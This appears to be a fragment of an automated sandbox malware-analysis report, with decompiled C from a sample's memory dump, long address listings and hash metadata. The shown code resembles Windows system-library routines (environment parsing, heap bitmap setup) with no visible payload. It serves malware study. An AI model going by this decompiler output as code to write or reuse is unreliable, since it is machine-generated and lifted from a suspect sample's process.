																if(__eflags >= 0) {
																	break;
																}
																__eflags =  *_t280 - _v48;
																_t187 =  *_t253;
																if( *_t280 == _v48) {
																	__eflags = _t280 - _t286;
																	break;
																}
																_t280 =  &(_t280[2]);
															}
															if(__eflags == 0) {
																 *_t280 = _v48;
																_t189 = _t293 + 2;
																_t280[1] = _t189;
																 *_t253 =  *_t253 + 1;
																 *0x1d8365d0 = _t189;
															}
														}
														goto L52;
													}
													L41:
													_v36 = 0;
													_t275 = _v48;
													while(1) {
														_t177 =  *_t293 & 0x0000ffff;
														__eflags = _t177;
														if(_t177 == 0) {
															goto L53;
														}
														__eflags = _t177 - 0x3d;
														if(_t177 == 0x3d) {
															__eflags = _t293 - _t275;
															if(_t293 == _t275) {
																goto L44;
															}
															__eflags = _t177;
															if(_t177 == 0) {
																goto L53;
															}
															goto L47;
														}
														L44:
														_t293 = _t293 + 2;
														_v40 = _t293;
													}
													goto L53;
												}
												 *0x1d8365d0 = _t293;
												_v32 = 0xc0000100;
											}
											L28:
											_v8 = 0;
											E1D74FCC9();
											goto L29;
										}
										__eflags = _t286 - _a20;
										if(_t286 >= _a20) {
											__eflags = _t282;
											if(_t282 != 0) {
												__eflags = _a20 - 1;
												if(_a20 >= 1) {
													 *_t282 = 0;
												}
											}
											goto L78;
										} else {
											 *_a24 = _t286;
											_t286 = _t286 + _t286;
											E1D7888C0(_t282, _t264, _t286);
											_t301 = _t301 + 0xc;
											 *((short*)(_t286 + _a16)) = 0;
											_t174 = 0;
											goto L27;
										}
									}
									_t240 = _v72;
									__eflags =  *((intOrPtr*)(0x1d836384 + _t240 * 4)) - 3;
									if( *((intOrPtr*)(0x1d836384 + _t240 * 4)) != 3) {
										_t293 =  *0x1d8365d0; // 0x1b167b2
										__eflags = _t293;
										if(_t293 == 0) {
											_t293 =  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48);
										}
									} else {
										_t293 =  *(0x1d83639c + _t240 * 4);
									}
									_v36 = _t293;
									goto L26;
								}
							}
							_t243 = _a12;
						}
						_t290 = _t290 - 1;
					}
					_t291 = _a16;
					goto L7;
				}
			}











































































                                                                                                                              0x1d74f875
                                                                                                                              0x1d74f877
                                                                                                                              0x1d74f87c
                                                                                                                              0x1d74f887
                                                                                                                              0x1d74f888
                                                                                                                              0x1d74f88e
                                                                                                                              0x1d74f893
                                                                                                                              0x1d74f898
                                                                                                                              0x1d74f89c
                                                                                                                              0x1d74f8a2
                                                                                                                              0x1d74f8ab
                                                                                                                              0x1d74f8b1
                                                                                                                              0x1d74f8b7
                                                                                                                              0x1d74f8bc
                                                                                                                              0x1d7a4864
                                                                                                                              0x00000000
                                                                                                                              0x1d74f8c2
                                                                                                                              0x1d74f8c2
                                                                                                                              0x1d74f8c9
                                                                                                                              0x1d74f8ce
                                                                                                                              0x1d74f8d1
                                                                                                                              0x1d74f8d6
                                                                                                                              0x1d74f8d6
                                                                                                                              0x1d74f8db
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74f8dd
                                                                                                                              0x1d74f8e0
                                                                                                                              0x1d74f8e7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74f8e9
                                                                                                                              0x1d74fbc5
                                                                                                                              0x1d74fbca
                                                                                                                              0x1d74fbcd
                                                                                                                              0x1d74fbcf
                                                                                                                              0x1d7a4874
                                                                                                                              0x1d7a4885
                                                                                                                              0x1d7a4887
                                                                                                                              0x1d7a488a
                                                                                                                              0x1d74f8f5
                                                                                                                              0x1d74f8f5
                                                                                                                              0x1d74f8f8
                                                                                                                              0x1d74f8fa
                                                                                                                              0x1d74fa5c
                                                                                                                              0x1d74fa5c
                                                                                                                              0x1d74fa63
                                                                                                                              0x1d74fa65
                                                                                                                              0x1d74fa68
                                                                                                                              0x1d74fa76
                                                                                                                              0x1d74fa76
                                                                                                                              0x1d74f900
                                                                                                                              0x1d74f906
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74f90c
                                                                                                                              0x1d74f90f
                                                                                                                              0x1d74f911
                                                                                                                              0x1d74fc8f
                                                                                                                              0x1d74fc92
                                                                                                                              0x1d74fc96
                                                                                                                              0x1d74fcdb
                                                                                                                              0x1d74fcc1
                                                                                                                              0x1d74fcc1
                                                                                                                              0x00000000
                                                                                                                              0x1d74fcc1
                                                                                                                              0x1d74fc9b
                                                                                                                              0x1d74fc9e
                                                                                                                              0x1d74fca1
                                                                                                                              0x1d74fca4
                                                                                                                              0x1d7a4892
                                                                                                                              0x1d7a4895
                                                                                                                              0x1d7a4897
                                                                                                                              0x1d7a48aa
                                                                                                                              0x1d7a48bd
                                                                                                                              0x1d7a48bf
                                                                                                                              0x1d7a48c2
                                                                                                                              0x1d7a48c8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a48ce
                                                                                                                              0x1d7a48d3
                                                                                                                              0x1d7a48d6
                                                                                                                              0x1d74fcac
                                                                                                                              0x1d74fcbf
                                                                                                                              0x00000000
                                                                                                                              0x1d74fcbf
                                                                                                                              0x1d7a489a
                                                                                                                              0x1d7a489f
                                                                                                                              0x1d7a48a2
                                                                                                                              0x1d7a48a4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a48a4
                                                                                                                              0x1d74fcaa
                                                                                                                              0x1d74fcaa
                                                                                                                              0x1d74fcaa
                                                                                                                              0x00000000
                                                                                                                              0x1d74fcaa
                                                                                                                              0x1d74f920
                                                                                                                              0x1d74f925
                                                                                                                              0x1d74f935
                                                                                                                              0x1d74f938
                                                                                                                              0x1d74f93b
                                                                                                                              0x1d74f93e
                                                                                                                              0x1d74f941
                                                                                                                              0x1d74f944
                                                                                                                              0x1d74fa3e
                                                                                                                              0x1d74fa3e
                                                                                                                              0x1d74fa43
                                                                                                                              0x00000000
                                                                                                                              0x1d74f94a
                                                                                                                              0x1d74f951
                                                                                                                              0x1d74f951
                                                                                                                              0x1d74f953
                                                                                                                              0x1d74f956
                                                                                                                              0x1d74f95d
                                                                                                                              0x1d74f967
                                                                                                                              0x1d74f96a
                                                                                                                              0x1d74f970
                                                                                                                              0x1d74f970
                                                                                                                              0x1d74f970
                                                                                                                              0x1d74f972
                                                                                                                              0x00000000
                                                                                                                              0x1d74f978
                                                                                                                              0x1d74f978
                                                                                                                              0x1d74f97a
                                                                                                                              0x1d74f97d
                                                                                                                              0x1d74f980
                                                                                                                              0x1d74f980
                                                                                                                              0x1d74f980
                                                                                                                              0x1d74f983
                                                                                                                              0x1d74f983
                                                                                                                              0x1d74f983
                                                                                                                              0x1d74f986
                                                                                                                              0x1d74f989
                                                                                                                              0x1d74f98b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74f98d
                                                                                                                              0x1d74f993
                                                                                                                              0x1d74f996
                                                                                                                              0x1d74f9ab
                                                                                                                              0x1d74f9b6
                                                                                                                              0x1d74f9b9
                                                                                                                              0x1d74f9bc
                                                                                                                              0x1d74f9bf
                                                                                                                              0x1d74f9c2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74f9c7
                                                                                                                              0x1d74f9c9
                                                                                                                              0x00000000
                                                                                                                              0x1d74f9cb
                                                                                                                              0x1d74f9cb
                                                                                                                              0x1d74f9ce
                                                                                                                              0x1d74f9d1
                                                                                                                              0x1d74f9d4
                                                                                                                              0x00000000
                                                                                                                              0x1d74f9d4
                                                                                                                              0x1d74f9c9
                                                                                                                              0x1d74f998
                                                                                                                              0x1d74f998
                                                                                                                              0x1d74f99b
                                                                                                                              0x1d74f99e
                                                                                                                              0x1d74f99e
                                                                                                                              0x1d74f9dc
                                                                                                                              0x1d74f9e4
                                                                                                                              0x1d74f9eb
                                                                                                                              0x1d74f9ed
                                                                                                                              0x1d74f9f0
                                                                                                                              0x1d74f9f3
                                                                                                                              0x1d74f9f5
                                                                                                                              0x1d74fc4b
                                                                                                                              0x1d74fc4e
                                                                                                                              0x1d74fc50
                                                                                                                              0x1d74fa46
                                                                                                                              0x1d74fa46
                                                                                                                              0x1d74fa49
                                                                                                                              0x1d74fa4e
                                                                                                                              0x1d74fa79
                                                                                                                              0x1d74fa7c
                                                                                                                              0x1d74fa7f
                                                                                                                              0x1d74fa82
                                                                                                                              0x1d74fa82
                                                                                                                              0x1d74fa85
                                                                                                                              0x1d74fa89
                                                                                                                              0x00000000
                                                                                                                              0x1d74fa8f
                                                                                                                              0x1d74fa8f
                                                                                                                              0x1d74fa92
                                                                                                                              0x1d74fa92
                                                                                                                              0x1d74fa92
                                                                                                                              0x1d74fa94
                                                                                                                              0x1d74fa94
                                                                                                                              0x1d74fa94
                                                                                                                              0x1d74fa97
                                                                                                                              0x1d74fa99
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74fa9b
                                                                                                                              0x1d74fa9e
                                                                                                                              0x1d74faa1
                                                                                                                              0x1d74fac9
                                                                                                                              0x1d74fac9
                                                                                                                              0x00000000
                                                                                                                              0x1d74fac9
                                                                                                                              0x1d74faa3
                                                                                                                              0x1d74faa5
                                                                                                                              0x1d74faa8
                                                                                                                              0x1d74faab
                                                                                                                              0x1d74fb4b
                                                                                                                              0x1d74fb4e
                                                                                                                              0x1d7a48e8
                                                                                                                              0x1d7a48ee
                                                                                                                              0x1d7a48f0
                                                                                                                              0x1d7a48fb
                                                                                                                              0x1d7a48fe
                                                                                                                              0x1d7a4927
                                                                                                                              0x1d7a4927
                                                                                                                              0x1d7a48fe
                                                                                                                              0x1d74fb54
                                                                                                                              0x1d74fb54
                                                                                                                              0x1d74fb54
                                                                                                                              0x1d74fb54
                                                                                                                              0x1d74fb57
                                                                                                                              0x1d74fb57
                                                                                                                              0x1d74fab1
                                                                                                                              0x1d74fab4
                                                                                                                              0x1d74fab7
                                                                                                                              0x1d74fb6d
                                                                                                                              0x1d74fb70
                                                                                                                              0x1d7a4930
                                                                                                                              0x1d7a4937
                                                                                                                              0x1d7a4942
                                                                                                                              0x1d7a4945
                                                                                                                              0x1d7a4952
                                                                                                                              0x1d7a4966
                                                                                                                              0x1d7a4974
                                                                                                                              0x1d7a497e
                                                                                                                              0x1d7a4981
                                                                                                                              0x1d7a4981
                                                                                                                              0x1d7a4945
                                                                                                                              0x1d74fb76
                                                                                                                              0x1d74fb76
                                                                                                                              0x1d74fb76
                                                                                                                              0x1d74fb70
                                                                                                                              0x1d74fabd
                                                                                                                              0x1d74fac0
                                                                                                                              0x1d74fac3
                                                                                                                              0x1d74fb5f
                                                                                                                              0x1d74fb62
                                                                                                                              0x1d74fb65
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74fac3
                                                                                                                              0x1d74facb
                                                                                                                              0x1d74fbef
                                                                                                                              0x1d74fbf3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74fbf9
                                                                                                                              0x1d74fc00
                                                                                                                              0x1d74fafe
                                                                                                                              0x1d74fafe
                                                                                                                              0x1d74fb00
                                                                                                                              0x1d74fb00
                                                                                                                              0x1d74fb04
                                                                                                                              0x1d74fb06
                                                                                                                              0x1d74fb09
                                                                                                                              0x00000000
                                                                                                                              0x1d74fb09
                                                                                                                              0x1d74fb12
                                                                                                                              0x1d74fb17
                                                                                                                              0x1d74fb1a
                                                                                                                              0x1d74fb33
                                                                                                                              0x1d74fb33
                                                                                                                              0x1d74fb37
                                                                                                                              0x1d74fc08
                                                                                                                              0x1d74fc0d
                                                                                                                              0x1d74fc0f
                                                                                                                              0x1d74fc12
                                                                                                                              0x1d74fc15
                                                                                                                              0x1d74fc17
                                                                                                                              0x1d74fc82
                                                                                                                              0x1d74fc86
                                                                                                                              0x1d74fc88
                                                                                                                              0x1d74fc35
                                                                                                                              0x1d74fc35
                                                                                                                              0x00000000
                                                                                                                              0x1d74fc35
                                                                                                                              0x1d74fc19
                                                                                                                              0x1d74fc1b
                                                                                                                              0x1d74fc79
                                                                                                                              0x1d74fc7b
                                                                                                                              0x1d74fc7d
                                                                                                                              0x1d74fc80
                                                                                                                              0x1d74fce4
                                                                                                                              0x1d74fce4
                                                                                                                              0x1d74fc80
                                                                                                                              0x00000000
                                                                                                                              0x1d74fc7b
                                                                                                                              0x1d74fc20
                                                                                                                              0x1d74fc22
                                                                                                                              0x1d74fc27
                                                                                                                              0x1d74fc2f
                                                                                                                              0x1d74fc2f
                                                                                                                              0x1d74fc31
                                                                                                                              0x00000000
                                                                                                                              0x1d74fc31
                                                                                                                              0x1d74fb3d
                                                                                                                              0x1d74fb3d
                                                                                                                              0x1d74fb40
                                                                                                                              0x1d74fb43
                                                                                                                              0x00000000
                                                                                                                              0x1d74fb43
                                                                                                                              0x1d74fb25
                                                                                                                              0x1d74fb2c
                                                                                                                              0x1d74fb2e
                                                                                                                              0x1d74fb31
                                                                                                                              0x1d74fb7e
                                                                                                                              0x1d74fb81
                                                                                                                              0x1d74fb81
                                                                                                                              0x1d74fb8b
                                                                                                                              0x1d74fb8d
                                                                                                                              0x1d74fb8f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74fb94
                                                                                                                              0x1d74fb96
                                                                                                                              0x1d74fb98
                                                                                                                              0x1d74fb9f
                                                                                                                              0x00000000
                                                                                                                              0x1d74fb9f
                                                                                                                              0x1d74fb9a
                                                                                                                              0x1d74fb9a
                                                                                                                              0x1d74fba1
                                                                                                                              0x1d74fba6
                                                                                                                              0x1d74fba8
                                                                                                                              0x1d74fbab
                                                                                                                              0x1d74fbae
                                                                                                                              0x1d74fbb0
                                                                                                                              0x1d74fbb0
                                                                                                                              0x1d74fba1
                                                                                                                              0x00000000
                                                                                                                              0x1d74fb31
                                                                                                                              0x1d74fad1
                                                                                                                              0x1d74fad1
                                                                                                                              0x1d74fad8
                                                                                                                              0x1d74fae0
                                                                                                                              0x1d74fae0
                                                                                                                              0x1d74fae3
                                                                                                                              0x1d74fae6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74fae8
                                                                                                                              0x1d74faeb
                                                                                                                              0x1d74faf5
                                                                                                                              0x1d74faf7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74faf9
                                                                                                                              0x1d74fafc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74fafc
                                                                                                                              0x1d74faed
                                                                                                                              0x1d74faed
                                                                                                                              0x1d74faf0
                                                                                                                              0x1d74faf0
                                                                                                                              0x00000000
                                                                                                                              0x1d74fae0
                                                                                                                              0x1d74fbdd
                                                                                                                              0x1d74fbe3
                                                                                                                              0x1d74fbe3
                                                                                                                              0x1d74fa50
                                                                                                                              0x1d74fa50
                                                                                                                              0x1d74fa57
                                                                                                                              0x00000000
                                                                                                                              0x1d74fa57
                                                                                                                              0x1d74f9fb
                                                                                                                              0x1d74f9fe
                                                                                                                              0x1d74fc3d
                                                                                                                              0x1d74fc3f
                                                                                                                              0x1d74fc41
                                                                                                                              0x1d74fc45
                                                                                                                              0x1d7a48e0
                                                                                                                              0x1d7a48e0
                                                                                                                              0x1d74fc45
                                                                                                                              0x00000000
                                                                                                                              0x1d74fa04
                                                                                                                              0x1d74fa07
                                                                                                                              0x1d74fa09
                                                                                                                              0x1d74fa0e
                                                                                                                              0x1d74fa13
                                                                                                                              0x1d74fa1b
                                                                                                                              0x1d74fa1f
                                                                                                                              0x00000000
                                                                                                                              0x1d74fa1f
                                                                                                                              0x1d74f9fe
                                                                                                                              0x1d74fa23
                                                                                                                              0x1d74fa26
                                                                                                                              0x1d74fa2e
                                                                                                                              0x1d74fc5a
                                                                                                                              0x1d74fc60
                                                                                                                              0x1d74fc62
                                                                                                                              0x1d74fc71
                                                                                                                              0x1d74fc71
                                                                                                                              0x1d74fa34
                                                                                                                              0x1d74fa34
                                                                                                                              0x1d74fa34
                                                                                                                              0x1d74fa3b
                                                                                                                              0x00000000
                                                                                                                              0x1d74fa3b
                                                                                                                              0x1d74f944
                                                                                                                              0x1d74fbd5
                                                                                                                              0x1d74fbd5
                                                                                                                              0x1d74f8ef
                                                                                                                              0x1d74f8ef
                                                                                                                              0x1d74f8f2
                                                                                                                              0x00000000
                                                                                                                              0x1d74f8f2

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e946f3ddf7725e7337a4f53756fd168fe1116c13831a840cb7841c3716abf733
                                                                                                                              • Instruction ID: 43f51427f47561cf6a0337a8c4ed9d45cc30a6f5fd92ab4fb3e48b3207ccfed3
                                                                                                                              • Opcode Fuzzy Hash: e946f3ddf7725e7337a4f53756fd168fe1116c13831a840cb7841c3716abf733
                                                                                                                              • Instruction Fuzzy Hash: 52F1C276E01219CFCB06CF58C888AADF7B1FB89724F25C51AE845AB350E735E941CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D753800 Relevance: .3, Instructions: 349COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E1D753800(signed int __ecx, intOrPtr* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				short _v22;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _v48;
				void* __ebx;
				signed int _t183;
				char* _t189;
				signed int _t199;
				unsigned int _t200;
				signed int _t201;
				signed int _t206;
				intOrPtr _t218;
				intOrPtr _t219;
				signed int _t221;
				intOrPtr _t223;
				intOrPtr* _t234;
				signed int _t246;
				signed int _t252;
				signed int _t260;
				intOrPtr _t264;
				signed int _t269;
				signed int _t270;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t278;
				intOrPtr _t280;
				signed char _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t286;
				intOrPtr* _t288;
				signed int _t296;
				signed int _t298;
				signed int _t306;
				void* _t309;
				intOrPtr* _t310;
				signed int _t313;
				signed int _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t324;
				signed int _t327;
				signed int _t332;
				intOrPtr _t338;
				intOrPtr _t339;
				signed short _t341;
				signed int _t342;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				intOrPtr* _t349;
				unsigned int _t354;
				signed int _t355;

				_t310 = __edx;
				_t269 = __ecx;
				_t275 =  *(__edx + 0x1b) & 0x000000ff;
				_v8 = __edx;
				_v20 = __ecx;
				_v44 =  *((intOrPtr*)(__edx + 0x10));
				_t338 = _a16;
				_t183 =  *(_t338 + 2) & 0x000000ff;
				if(_t275 != 0) {
					_t278 = 0xffffff98 + _t275 * 0x68 +  *((intOrPtr*)(__ecx + 0x5c4 + _t183 * 4));
				} else {
					_t278 =  *((intOrPtr*)(__ecx + 0x3c0 + _t183 * 4));
				}
				_t339 = _a8;
				_v16 = _t278;
				_t187 =  *(_t338 + 3) >> 0x00000001 & 0x00000003;
				if(( *(_t338 + 3) >> 0x00000001 & 0x00000003) != 0) {
					_t189 = E1D800EAD(_t269, _t310, _a4, _t187 & 0x000000ff, _t339, _a12, _a16);
					if(_t189 != 0) {
						goto L23;
					}
					_t310 = _v8;
					goto L3;
				} else {
					L3:
					_t280 = _a12;
					_t15 = _t339 + 8; // 0x9
					_t347 = _t15;
					_v36 = _t347;
					_t341 = 0;
					_v24 = _t347 >> 0x00000003 & 0x0000ffff;
					 *_a4 = _t310;
					_t313 = _a4;
					_t199 = ((_t280 - 0x00000020) / _t347 + 0x0000001f >> 0x00000003) + 0x00000020 & 0xfffffff8;
					_v40 = _t199;
					_t200 = _t199 + _t313;
					_t315 =  *0x1d836964; // 0x8e1c48cd
					_v12 = _t315;
					if(_t200 + _t347 > _t313 + _t280) {
						L7:
						_t201 = _a4;
						_t44 = _t201 + 0x1c; // -33
						_t348 = _t44;
						 *(_t201 + 0x14) = _t341;
						 *((intOrPtr*)(_t201 + 0x18)) = _t348;
						_t47 = _t341 + 7; // 0x8
						E1D788F40(_t348, 0, _t47 >> 3);
						_t283 = _t341 & 0x0000001f;
						if(_t283 != 0) {
							 *(_t348 + (_t341 >> 5) * 4) =  *(_t348 + (_t341 >> 5) * 4) | (_t341 >> 0x00000005 | 0xffffffff) << _t283;
						}
						_t349 = _v8;
						_t316 = _v16;
						_t284 = _a4;
						 *((short*)(_t349 + 0x14)) = _v24;
						_t206 = _t341 & 0x0000ffff;
						 *(_t349 + 0x18) = _t206;
						_v32 = _t206;
						 *_t349 = _t316;
						 *((char*)(_t349 + 0x1a)) =  *((intOrPtr*)(_a16 + 2));
						 *((short*)(_t349 + 0x16)) = 0;
						 *(_t349 + 4) = _t284;
						 *((intOrPtr*)(_t349 + 8)) = 0;
						 *((intOrPtr*)(_t349 + 0xc)) = 0;
						_v22 = _v24 << 3;
						_v24 = _v40;
						 *(_t284 + 0x10) = _v12 ^ _v24 ^ _t269 ^ _t284;
						if( *((intOrPtr*)(_t316 + 0x54)) == 0) {
							_t285 =  *_t316;
							_t218 =  *((intOrPtr*)(_t285 + 0x14));
							if(_t218 < 0x20) {
								_t219 = _t218 + 4;
								goto L28;
							}
							goto L26;
						} else {
							 *((short*)(_t316 + 0x60)) =  *((short*)(_t316 + 0x60)) + 1;
							if( *((short*)(_t316 + 0x60)) > 0x1c) {
								_t285 =  *_t316;
								_t264 =  *((intOrPtr*)(_t285 + 0x14));
								if(_t264 == 0) {
									L26:
									 *((short*)(_t316 + 0x60)) = 0;
									goto L11;
								}
								_t219 = _t264 + 0xfffffffc;
								L28:
								 *((intOrPtr*)(_t285 + 0x14)) = _t219;
								goto L26;
							}
							L11:
							_t75 = _t316 + 0x50; // 0x51
							_t221 = _t75;
							_v12 = _t221;
							do {
								_t317 =  *_t221;
								_t286 =  *((intOrPtr*)(_t221 + 4));
								_v40 = _t317;
								_v36 = _t286;
								_t270 = _t317 + _t341;
								if(_t341 <= 0) {
								}
								_t318 = _t286;
								asm("lock cmpxchg8b [esi]");
								_t221 = _v12;
							} while (_t317 != _v40 || _t318 != _v36);
							_t288 = _v16;
							_t223 =  *_t288;
							 *((intOrPtr*)(_t223 + 0x10)) =  *((intOrPtr*)(_t223 + 0x10)) + 1;
							 *((intOrPtr*)(_t288 + 0x58)) =  *((intOrPtr*)(_t223 + 0x10));
							_v24 = ( *((E1D797AF9(_t288) & 0x0000ffff) + 0x1d834200) & 0x000000ff) % _t341 << 0x10;
							_v24 = _v32;
							asm("lock or [eax], ecx");
							_t322 = _v8;
							_t290 = _v24;
							 *((intOrPtr*)(_a4 + 0xc)) = 0xf0e0d0c0;
							 *((intOrPtr*)(_v8 + 0x1c)) = 1;
							asm("lock cmpxchg [esi], ecx");
							if(( *0x1d836638 & 0x00000002) != 0) {
								L20:
								_t234 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
								if(_t234 != 0) {
									if( *_t234 == 0) {
										goto L21;
									}
									_t189 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									L22:
									if( *_t189 != 0) {
										_t189 =  *[fs:0x30];
										if(( *(_t189 + 0x240) & 0x00000001) != 0) {
											_t189 = E1D7FF68C(_t270,  *(_v20 + 0xc),  *((intOrPtr*)(_t322 + 4)),  *(_t322 + 0x14) & 0x0000ffff,  *(_t322 + 0x18) & 0x0000ffff,  *(_t322 + 0x1b) & 0x000000ff);
										}
									}
									L23:
									return _t189;
								}
								L21:
								_t189 = 0x7ffe0380;
								goto L22;
							}
							_t354 =  *( *[fs:0x18] + 0xfaa) & 0xff;
							_v24 = _t354;
							if( *0x1d836634 == 0) {
								_push(0);
								_push(4);
								_push(0x1d836634);
								_push(0x24);
								_push(0xffffffff);
								if(E1D782B20() >= 0) {
									goto L18;
								}
								_t344 =  *0x7ffe0004;
								_v44 = _t344;
								if(_t344 < 0x1000000) {
									_t270 = 0x7ffe0324;
									while(1) {
										_t298 =  *_t270;
										_t327 =  *0x7ffe0320;
										if(_t298 ==  *0x7ffe0328) {
											break;
										}
										asm("pause");
									}
									_t354 = _v24;
									_t290 = (_t298 << 8) * _v44;
									_t260 = ((_t327 * _v44 >> 0x00000020 << 0x00000020 | _t327 * _v44) >> 0x18) + (_t298 << 8) * _v44;
									L41:
									 *0x1d836634 = _t260;
									goto L18;
								}
								_t260 = ( *0x7ffe0320 * _t344 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t344) >> 0x18;
								goto L41;
							}
							L18:
							_t342 = E1D73ED00(_t290, 0x1d836634);
							_v40 = _t342;
							if( *0x1d836634 == 0) {
								_push(0);
								_push(4);
								_push(0x1d836634);
								_push(0x24);
								_push(0xffffffff);
								if(E1D782B20() >= 0) {
									goto L19;
								}
								_t270 =  *0x7ffe0004;
								_v44 = _t270;
								if(_t270 < 0x1000000) {
									_t270 = 0x7ffe0320;
									while(1) {
										_t296 =  *0x7ffe0324;
										_t324 =  *_t270;
										if(_t296 ==  *0x7ffe0328) {
											break;
										}
										asm("pause");
									}
									_t354 = _v24;
									_t342 = _v40;
									_t290 = (_t296 << 8) * _v44;
									_t252 = ((_t324 * _v44 >> 0x00000020 << 0x00000020 | _t324 * _v44) >> 0x18) + (_t296 << 8) * _v44;
									L49:
									 *0x1d836634 = _t252;
									goto L19;
								}
								_t252 = ( *0x7ffe0320 * _t270 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t270) >> 0x18;
								goto L49;
							}
							L19:
							_t246 = E1D73ED00(_t290, 0x1d836634);
							_t322 = _v8;
							_t355 = _t354 >> 3;
							 *(0x1d834200 + _t355 * 8) = _t246 & 0x7f7f7f7f;
							 *(0x1d834204 + _t355 * 8) = _t342 & 0x7f7f7f7f;
							goto L20;
						}
					} else {
						_v28 = _t347 << 0xd;
						_t273 = _t200 - _a4 << 0xd;
						do {
							_t332 = _t341 & 0x0000ffff;
							_t306 = _t200 >> 0x00000003 ^  *(_v20 + 0xc) ^ _t273 ^ _v12;
							_t341 = _t341 + 1;
							_t273 = _t273 + _v28;
							 *_t200 = _t306;
							_v32 = _t273;
							 *(_t200 + 4) = _t332 << 0x00000008 |  *(_t200 + 4) & 0xff0000ff;
							 *((char*)(_t200 + 7)) = 0x80;
							_t200 = _t200 + _t347;
							_t309 = _t347 + _t200;
							_t347 = _v36;
						} while (_t309 <= _a4 + _a12);
						_t269 = _v20;
						goto L7;
					}
				}
			}

































































                                                                                                                              0x1d753800
                                                                                                                              0x1d75380d
                                                                                                                              0x1d75380f
                                                                                                                              0x1d753813
                                                                                                                              0x1d753816
                                                                                                                              0x1d753819
                                                                                                                              0x1d75381d
                                                                                                                              0x1d753820
                                                                                                                              0x1d753826
                                                                                                                              0x1d753ac4
                                                                                                                              0x1d75382c
                                                                                                                              0x1d75382c
                                                                                                                              0x1d75382c
                                                                                                                              0x1d753836
                                                                                                                              0x1d75383b
                                                                                                                              0x1d75383e
                                                                                                                              0x1d753840
                                                                                                                              0x1d7a6867
                                                                                                                              0x1d7a686e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a6874
                                                                                                                              0x00000000
                                                                                                                              0x1d753846
                                                                                                                              0x1d753846
                                                                                                                              0x1d753846
                                                                                                                              0x1d753849
                                                                                                                              0x1d753849
                                                                                                                              0x1d75384e
                                                                                                                              0x1d753854
                                                                                                                              0x1d753859
                                                                                                                              0x1d75385f
                                                                                                                              0x1d753868
                                                                                                                              0x1d753874
                                                                                                                              0x1d753877
                                                                                                                              0x1d75387a
                                                                                                                              0x1d753883
                                                                                                                              0x1d753889
                                                                                                                              0x1d75388c
                                                                                                                              0x1d7538e6
                                                                                                                              0x1d7538e6
                                                                                                                              0x1d7538e9
                                                                                                                              0x1d7538e9
                                                                                                                              0x1d7538ec
                                                                                                                              0x1d7538ef
                                                                                                                              0x1d7538f2
                                                                                                                              0x1d7538fc
                                                                                                                              0x1d753906
                                                                                                                              0x1d753909
                                                                                                                              0x1d753918
                                                                                                                              0x1d753918
                                                                                                                              0x1d75391a
                                                                                                                              0x1d753920
                                                                                                                              0x1d753923
                                                                                                                              0x1d753926
                                                                                                                              0x1d75392a
                                                                                                                              0x1d75392d
                                                                                                                              0x1d753931
                                                                                                                              0x1d753937
                                                                                                                              0x1d75393c
                                                                                                                              0x1d753941
                                                                                                                              0x1d753945
                                                                                                                              0x1d753948
                                                                                                                              0x1d75394b
                                                                                                                              0x1d753954
                                                                                                                              0x1d75395b
                                                                                                                              0x1d753969
                                                                                                                              0x1d753971
                                                                                                                              0x1d753acb
                                                                                                                              0x1d753acd
                                                                                                                              0x1d753ad3
                                                                                                                              0x1d753ae0
                                                                                                                              0x00000000
                                                                                                                              0x1d753ae0
                                                                                                                              0x00000000
                                                                                                                              0x1d753977
                                                                                                                              0x1d753977
                                                                                                                              0x1d753980
                                                                                                                              0x1d753ae8
                                                                                                                              0x1d753aea
                                                                                                                              0x1d753aef
                                                                                                                              0x1d753ad5
                                                                                                                              0x1d753ad7
